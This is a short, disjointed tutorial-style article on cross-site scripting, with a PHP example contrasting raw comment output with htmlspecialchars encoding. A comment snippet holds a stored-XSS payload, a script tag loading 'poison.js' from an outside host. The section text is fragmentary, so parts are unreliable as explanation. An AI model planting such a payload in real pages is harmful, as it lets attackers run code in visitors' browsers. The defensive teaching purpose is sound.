How dangerous is XSS security?

Types of XSS

Previously, XSS mostly targeted HTML rendered on the server side, which is called Server XSS. The two common types of Server XSS are Persistent XSS and Reflected XSS.

<div class = "comment">
<p> I want to find JA* </p>
</div>

Prevention

The principle of the series “Introduction security” is: hack to learn, not learn to hack. My goal is not to teach you to hack and disrupt other sites, but to teach you to understand and prevent these attacks.

<div class = "comment">
<p><script src ="//po**hub.com/poison.js"></script></p>
</div>

Conclusion

A slightly subjective note (because I do not like PHP): sites built with PHP account for the largest number of XSS errors. The first reason is that the number of websites written in PHP is very high. The second reason is that PHP does not encode special characters by default. PHP CMSs like WordPress and Joomla are very powerful, with loads of plug-ins. However, many negligent plug-ins are responsible for this security error.
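
The default behaviour described above, shown as an added example (not code from the original article): a PHP comment renderer that prints stored text unchanged, next to the same renderer with `htmlspecialchars` applied. The function names, the sample comments and the `example.invalid` host are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed sample input: one harmless comment and one carrying markup.
// The host name is a placeholder, not a value from the article.
$comments = [
    'I want to find JA*',
    '<script src="//example.invalid/poison.js"></script>',
];

// Vulnerable: PHP prints the string exactly as stored, so any markup in the
// comment becomes part of the page.
function render_comment_raw(string $comment): string
{
    return "<div class=\"comment\">\n<p>" . $comment . "</p>\n</div>\n";
}

// Encode &, <, >, " and ' so the value is displayed as text in HTML.
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: the same template, with the comment encoded at output time.
function render_comment_encoded(string $comment): string
{
    return "<div class=\"comment\">\n<p>" . e($comment) . "</p>\n</div>\n";
}

foreach ($comments as $comment) {
    $raw     = render_comment_raw($comment);
    $encoded = render_comment_encoded($comment);

    echo "--- raw ---\n", $raw;
    echo "--- encoded ---\n", $encoded;

    // Simple regression check: no script tag may survive in the encoded output.
    $leaks = stripos($encoded, '<script') !== false;
    echo 'script tag in encoded output: ', $leaks ? 'yes' : 'no', "\n\n";
}
```

Encoding belongs at the point of output, as in `render_comment_encoded`, so the stored comment stays unchanged and every template that prints it applies the encoding for its own context.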

Beribey
